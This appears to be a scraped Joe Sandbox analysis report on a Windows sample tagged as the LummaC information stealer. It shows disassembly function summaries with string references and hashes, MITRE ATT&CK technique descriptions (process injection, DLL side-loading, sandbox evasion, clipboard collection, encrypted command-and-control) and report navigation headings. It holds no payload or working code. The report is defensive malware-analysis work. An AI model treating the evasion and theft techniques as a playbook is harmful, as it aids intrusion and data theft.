#, xrefs: 02B06DBA
=, xrefs: 02B06D4A
h, xrefs: 02B06C42
1, xrefs: 02B06D2A
;, xrefs: 02B06D7A

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: $!$#$$$%$'$)$*$+$,$-$/$0$1$3$5$7$9$;$=$?$@$B$K$L$S$T$U$V$W$[$[$_$c$f$h$u$y$}$~
API String ID: 2525500382-2477640369
Opcode ID: d5a75efd2dc169184571153fcfd9ddb74288f5d9ecaaa2ae70cb881388fa3589
Instruction ID: b68149b60a207797d3c48470974554dd84e69e2f739f163e1ee47f18d5bbe277
Opcode Fuzzy Hash: d5a75efd2dc169184571153fcfd9ddb74288f5d9ecaaa2ae70cb881388fa3589
Instruction Fuzzy Hash: 9A91956050D7C1CEE332DB288458B9BBFD16BA6318F084E9DD0ED5B292D7B64549CB23

Function 02B04355 Relevance: 47.3, APIs: 2, Strings: 25, Instructions: 87COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02B0435E
VariantInit.OLEAUT32 ref: 02B0436A

Strings

E, xrefs: 02B043D6
E, xrefs: 02B0438A
C, xrefs: 02B043DE
_, xrefs: 02B043EE
I, xrefs: 02B043C6
3, xrefs: 02B0439E
-, xrefs: 02B043B2
M, xrefs: 02B043B6
=, xrefs: 02B043E2
K, xrefs: 02B04392
S, xrefs: 02B0439A
*, xrefs: 02B043CA
7, xrefs: 02B043DA
^, xrefs: 02B043EA
D, xrefs: 02B043A2
5, xrefs: 02B043C2
7, xrefs: 02B0438E
5, xrefs: 02B04396
A, xrefs: 02B043E6
1, xrefs: 02B043A6
O, xrefs: 02B043AE
K, xrefs: 02B043BE
G, xrefs: 02B043CE
=, xrefs: 02B043D2
9, xrefs: 02B04386

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: *$-$1$3$5$5$7$7$9$=$=$A$C$D$E$E$G$I$K$K$M$O$S$^$_
API String ID: 2610073882-3575756633
Opcode ID: f30d9adc572bf93b857df2eabf1bd34a2aaaa3ce1eb7878ee178d4101e735c9d
Instruction ID: 165dcce4941ad726c1ac15ee038eafdbdb85ee7714c5b331fb68e25172a593c7
Opcode Fuzzy Hash: f30d9adc572bf93b857df2eabf1bd34a2aaaa3ce1eb7878ee178d4101e735c9d
Instruction Fuzzy Hash: B041A4601087C0CEE716DF29C598716BFE1AF66308F08889DC9994F387C7B9D919CB66

Function 02B03B73 Relevance: 45.6, APIs: 1, Strings: 25, Instructions: 81COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02B03B8C

Strings

I, xrefs: 02B03BE8
K, xrefs: 02B03BB4
M, xrefs: 02B03BD8
K, xrefs: 02B03BE0
*, xrefs: 02B03BEC
G, xrefs: 02B03BF0
D, xrefs: 02B03BC4
1, xrefs: 02B03BC8
9, xrefs: 02B03BA8
5, xrefs: 02B03BB8
E, xrefs: 02B03BAC
_, xrefs: 02B03C10
5, xrefs: 02B03BE4
7, xrefs: 02B03BB0
A, xrefs: 02B03C08
3, xrefs: 02B03BC0
C, xrefs: 02B03C00
=, xrefs: 02B03BF4
E, xrefs: 02B03BF8
-, xrefs: 02B03BD4
=, xrefs: 02B03C04
7, xrefs: 02B03BFC
O, xrefs: 02B03BD0
S, xrefs: 02B03BBC
^, xrefs: 02B03C0C

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: *$-$1$3$5$5$7$7$9$=$=$A$C$D$E$E$G$I$K$K$M$O$S$^$_
API String ID: 1927566239-3575756633
Opcode ID: ecdd333bae522058192abd73e0f03526e8033d8dea23fdf8fbab8ca663e39f8c
Instruction ID: 93310661f0628e85fd2732d56bef688e112e4993edba76cd57dc5915ca1f3d02
Opcode Fuzzy Hash: ecdd333bae522058192abd73e0f03526e8033d8dea23fdf8fbab8ca663e39f8c
Instruction Fuzzy Hash: CA4195601087C0CEE716CF29C498716BFE16B26318F1884CDD9994F397C3BAD959CB66

Function 02B03CB5 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 91COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02B03CBD
VariantInit.OLEAUT32 ref: 02B03CC9

Strings

G, xrefs: 02B03D55
Y, xrefs: 02B03D2D
E, xrefs: 02B03D5D
o, xrefs: 02B03CF5
S, xrefs: 02B03D05
U, xrefs: 02B03D1D
W, xrefs: 02B03D15
C, xrefs: 02B03D45
F, xrefs: 02B03D59
Q, xrefs: 02B03D0D
_, xrefs: 02B03D35
i, xrefs: 02B03CED
], xrefs: 02B03D3D
A, xrefs: 02B03D4D
k, xrefs: 02B03CE5
m, xrefs: 02B03CFD
[, xrefs: 02B03D25

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$F$G$Q$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2610073882-1723352897
Opcode ID: e0996bea8c7e0d7df3e5fe57a4e381cc60a62fbc41b91ff03c5b05436e2610c4
Instruction ID: a0f7b250111f8941a713285fbd50abdd2bb3aea6cd7cbd182a0b2af7e8a5891b
Opcode Fuzzy Hash: e0996bea8c7e0d7df3e5fe57a4e381cc60a62fbc41b91ff03c5b05436e2610c4
Instruction Fuzzy Hash: 7141C360108BC1CED7269F289888706BFA1AB56214F088ADDD8EA4F3DBC375D515CB62

Function 02B04EA8 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 86COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02B04EB4
VariantInit.OLEAUT32 ref: 02B04EC0

Strings

F, xrefs: 02B04F50
], xrefs: 02B04F34
o, xrefs: 02B04EEC
E, xrefs: 02B04F54
U, xrefs: 02B04F14
W, xrefs: 02B04F0C
_, xrefs: 02B04F2C
C, xrefs: 02B04F3C
m, xrefs: 02B04EF4
G, xrefs: 02B04F4C
k, xrefs: 02B04EDC
Y, xrefs: 02B04F24
S, xrefs: 02B04EFC
Q, xrefs: 02B04F04
i, xrefs: 02B04EE4
A, xrefs: 02B04F44
[, xrefs: 02B04F1C

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$F$G$Q$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2610073882-1723352897
Opcode ID: c1eae18f59ac4ffee0ea77bb963797135055c0218482eb278a7064780f6e9abf
Instruction ID: 1354da45d56182dd7aaae81e022d6082ecd418fd7726048ff478100b695e18e7
Opcode Fuzzy Hash: c1eae18f59ac4ffee0ea77bb963797135055c0218482eb278a7064780f6e9abf
Instruction Fuzzy Hash: 1F41C560108BC1CED726CF2C85C8706BFA16B66225F088ADDD8E94F7DBC365D515CB62

Function 02B06604 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 81COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02B0660E
VariantInit.OLEAUT32 ref: 02B06621

Strings

=, xrefs: 02B06643
0, xrefs: 02B06661
6, xrefs: 02B06657
0, xrefs: 02B06639
L, xrefs: 02B0667F
), xrefs: 02B06693
=, xrefs: 02B0666B
#, xrefs: 02B06689
#, xrefs: 02B0669D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: #$#$)$0$0$6$=$=$L
API String ID: 2610073882-2885410951
Opcode ID: e8b5f52624343379c492a6fc9385538e777372e2bdadf5104d74c467a61b1a26
Instruction ID: e6c796c08b47551d85595abef25ae09c26b71aca9d2955e0b8c4ee7d14c5f50a
Opcode Fuzzy Hash: e8b5f52624343379c492a6fc9385538e777372e2bdadf5104d74c467a61b1a26
Instruction Fuzzy Hash: 5041D27040CBC18ED322DB78845875AFFE0ABA6324F184E9DE5E48B3A2C7749509CB53

Function 02B067F8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02B06819

Strings

2, xrefs: 02B0684F
#, xrefs: 02B0689F
9, xrefs: 02B06863
5, xrefs: 02B06877
#, xrefs: 02B0688B

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: #$#$2$5$9
API String ID: 1927566239-987578143
Opcode ID: 51112f11b14b14a11f7f385de551d7c124f820d03dde6b65e91e96f5c3476552
Instruction ID: c98428de7e5d0e44945b101ec20e5adaf06da38380c28d65c77731b3a942cca7
Opcode Fuzzy Hash: 51112f11b14b14a11f7f385de551d7c124f820d03dde6b65e91e96f5c3476552
Instruction Fuzzy Hash: 1F41D37000C3C19ED362DB28848874EBFE0AB9A328F484A8DF4E44B3D2C7B48549CB57

Function 02B05F12 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02B05F27

Strings

5, xrefs: 02B05F85
#, xrefs: 02B05F99
9, xrefs: 02B05F71
#, xrefs: 02B05FAD
2, xrefs: 02B05F5D

Memory Dump Source

Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: #$#$2$5$9
API String ID: 1927566239-987578143
Opcode ID: 86081f0fd822470466c7f33cc73713d8fdc4e182d2e75907648c8bb52c348d09
Instruction ID: acdedcfb3cf164ae22e4cbdea0dadb1d4cf96f23520840799990acafbbb2bce9
Opcode Fuzzy Hash: 86081f0fd822470466c7f33cc73713d8fdc4e182d2e75907648c8bb52c348d09
Instruction Fuzzy Hash: 7841A47000C7C19ED362DB28848875EBFE16B96268F485E8DF0E45B3E2C7758545CB57

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report p37SE6gM52.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
p37SE6gM52.exe

Function 02B0E468 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 317
memoryCOMMON

Function 02B0DEE8 Relevance: 9.4, APIs: 6, Instructions: 382
COMMON

Function 02ADCD20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
threadCOMMON

Function 02B156C9 Relevance: 4.4, Strings: 3, Instructions: 610
COMMON

Function 02B15510 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Function 02B0DE76 Relevance: 3.1, APIs: 2, Instructions: 126
comCOMMON

Function 02B18BC0 Relevance: 2.6, Strings: 2, Instructions: 140
COMMON

Function 02AE076F Relevance: 1.5, Strings: 1, Instructions: 275
COMMON

Function 02AE1D87 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 356
COMMON

Function 02ADE8D0 Relevance: 1.6, APIs: 1, Instructions: 109
libraryCOMMON

Function 02B14E47 Relevance: 1.6, APIs: 1, Instructions: 67
libraryCOMMON

Function 02B0E349 Relevance: 1.6, APIs: 1, Instructions: 62
memoryCOMMON

Function 02B11F20 Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 02B11FA0 Relevance: 1.5, APIs: 1, Instructions: 38
memoryCOMMON